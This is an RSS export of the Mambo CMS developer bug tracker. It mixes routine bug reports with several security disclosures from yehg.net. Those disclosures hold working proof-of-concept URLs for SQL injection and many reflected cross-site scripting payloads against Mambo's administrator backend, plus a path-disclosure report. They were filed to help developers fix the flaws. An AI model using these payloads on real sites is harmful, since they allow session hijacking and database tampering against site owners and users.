Mambo Tracker->

Mambo Tracker-> Fri, 16 Dec 2011 03:04:30 -0500 Mambo Tracker System http://www.mambo-developer.org/tracker/ FS#485: writeable status for cache folder inconsistencies Andres Felipe Vargas valencia Fri, 16 Dec 2011 03:04:30 -0500 http://www.mambo-developer.org/tracker/index.php?do=details&task_id=485 http://www.mambo-developer.org/tracker/index.php?do=details&task_id=485 FS#484: Link List disappears when quote marks used in content title Chas Large Tue, 05 Jul 2011 13:33:00 -0400
This is discussed in the support forum topic here:
http://forum.mambo-foundation.org/showthread.php?t=18912 especially from post 9 onwards.

]]> http://www.mambo-developer.org/tracker/index.php?do=details&task_id=484 http://www.mambo-developer.org/tracker/index.php?do=details&task_id=484 FS#483: I have new mambo5, change cakephp version to 1.3.6 Suriya Kaewmungmuang Tue, 23 Nov 2010 23:33:53 -0500 http://www.mambo-developer.org/tracker/index.php?do=details&task_id=483 http://www.mambo-developer.org/tracker/index.php?do=details&task_id=483 FS#482: [Backend] SQL Injection yehg.net Sun, 31 Oct 2010 18:40:04 -0400

=====Backend (Administrator)=====

====param: section====

http://attacker.in/mambo/administrator/index2.php?order[]=0&limit=10&task=&cid[]=on&chosen=&type=other&hidemainmenu=0&section=com_weblinks%27&boxchecked=0&toggle=on&limitstart=0&act=&option=com_categories

====param: zorder====

http://attacker.in/mambo/administrator/index2.php?limit=10&order%5b%5d=11&boxchecked=0&toggle=on&search=sqli&task=&limitstart=0&cid%5b%5d=on&zorder=c.ordering+DESC'&filter_authorid=62&hidemainmenu=0&option=com_typedcontent
]]> http://www.mambo-developer.org/tracker/index.php?do=details&task_id=482 http://www.mambo-developer.org/tracker/index.php?do=details&task_id=482 FS#481: [Backend] Cross Site Scripting yehg.net Sun, 31 Oct 2010 18:37:37 -0400

=====BackEnd [Administrator Section]=====

====param: menu====

http://attacker.in/mambo/administrator/index2.php?option=com_menumanager&task=edit&hidemainmenu=1&menu=Move+your+mouse+here%22%20style=position:absolute;width:1000px;height:1000px;top:0;left:0;%20onmouseover=alert%28/XSS/%29%20

====param: menutype====
[hidden form xss which works in in IE 6,7 and older versions of Firefox]

http://attacker.in/mambo/administrator/index2.php?option=com_menus&menutype=xss"%20style%3dx%3aexpression(alert(/XSS/))%20XSSSSSSSS
http://attacker.in/mambo/administrator/index2.php?option=com_menus&menutype=xss"%20%20%20style=background-image:url('javascript:alert(/XSS/)');width:1000px;height:1000px;display:block;%20x=%20XSSSSSSSS

====param: zorder====

http://attacker.in/mambo/administrator/index2.php?limit=10&order%5b%5d=11&boxchecked=0&toggle=on&search=simple_search&task=&limitstart=0&cid%5b%5d=on&zorder=c.ordering+DESC">alert(/XSS/)&filter_authorid=62&hidemainmenu=0&option=com_typedcontent

====param: search====

http://attacker.in/mambo/administrator/index2.php?limit=10&boxchecked=0&toggle=on&search=xss">alert(/XSS/)&task=&limitstart=0&hidemainmenu=0&option=com_comment

====param: client====

http://attacker.in/mambo/administrator/index2.php?option=com_modules&client=%27%22%20onmouseover=alert%28/XSS/%29%20a=%22%27
NB: mouseover on "banner" link

====param: section====
[hidden form xss, esp in IE 6,7 and older versions of Firefox]

http://attacker.in/mambo/administrator/index2.php?option=com_categories&section=com_weblinks"%20style%3dx%3aexpression(alert(/XSS/))%20XSSSSSSSS&task=editA&hidemainmenu=1&id=2

http://attacker.in/mambo/administrator/index2.php?option=com_categories&section=com_weblinks"%20style%3d-moz-binding:url(http://www.businessinfo.co.uk/labs/xbl/xbl.xml%23xss)%20XSSSSSSSS&task=editA&hidemainmenu=1&id=2

http://attacker.in/mambo/administrator/index2.php?option=com_categories&section=com_weblinks"%20%20style=background-image:url('javascript:alert(0)');width:1000px;height:1000px;display:block;%20x=%20XSSSSSSSS&task=editA&hidemainmenu=1&id=2

http://attacker.in/mambo/administrator/index2.php?option=com_categories&section=com_weblinks"%20%20style=background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%20x=%20XSSSSSSSS&task=editA&hidemainmenu=1&id=2]]> http://www.mambo-developer.org/tracker/index.php?do=details&task_id=481 http://www.mambo-developer.org/tracker/index.php?do=details&task_id=481 FS#480: Atom feed tag all the items with today date Andres Felipe Vargas valencia Sat, 30 Oct 2010 00:13:11 -0400 http://www.mambo-developer.org/tracker/index.php?do=details&task_id=480 http://www.mambo-developer.org/tracker/index.php?do=details&task_id=480 FS#479: Cross Site Scripting yehg.net Thu, 28 Oct 2010 14:46:53 -0400 ======================================

1. Go to the following poc site
http://attacker.in/mambo/index.php?option=com_content&task=%22%20style=width:1000px;height:1000px;top:0;left:0;position:absolute%20onmouseover=alert%28/XSS/%29%20ns=%22%20&id=3&Itemid=32

2. Move your mouse a bit
You'll get the XSS alert box.

=========================================

For more information about XSS, see:
http://en.wikipedia.org/wiki/Cross-site_scripting

IMPACT

Attackers can compromise currently logged-in user/administrator
session and impersonate arbitrary user actions available under
/administrator/ functions.

Best regards
YGN Ethical Hacker Group
http://yehg.net/
]]> http://www.mambo-developer.org/tracker/index.php?do=details&task_id=479 http://www.mambo-developer.org/tracker/index.php?do=details&task_id=479 FS#478: [security] Path Dislcosure yehg.net Wed, 22 Sep 2010 06:10:38 -0400
Fatal error: Class 'SpellChecker' not found in /home/attacker/public_html/mambo/mambots/editors/mostlyce/jscripts/tiny_mce/plugins/spellchecker/classes/PSpellShell.php on line 9

Please see the attachment for vulnerable urls.

Many developers see this path disclosure as server issues but this poses risk to users in some situations.
http://yehg.net/lab/pr0js/view.php/path_disclosure_vulnerability.txt]]> http://www.mambo-developer.org/tracker/index.php?do=details&task_id=478 http://www.mambo-developer.org/tracker/index.php?do=details&task_id=478 FS#477: includes/vcard.class.php Luis Tue, 27 Jul 2010 17:47:40 -0400
php 5.3.2 includes a function name wholes themselves

Regards

Luis]]> http://www.mambo-developer.org/tracker/index.php?do=details&task_id=477 http://www.mambo-developer.org/tracker/index.php?do=details&task_id=477 FS#476: methods query, setBareQuery and setQuery of database class are not consistent Andres Felipe Vargas valencia Thu, 01 Jul 2010 11:52:53 -0400 setBareQuery, sets the sql to execute WITHOUT process the #__ prefix

Now the query method allows to pass a sql as argument, but this sql is not getting processed, it sounds to me that the *only* way to avoid the process should be using setBareQuery, all the others methods have to process the sql. ]]> http://www.mambo-developer.org/tracker/index.php?do=details&task_id=476 http://www.mambo-developer.org/tracker/index.php?do=details&task_id=476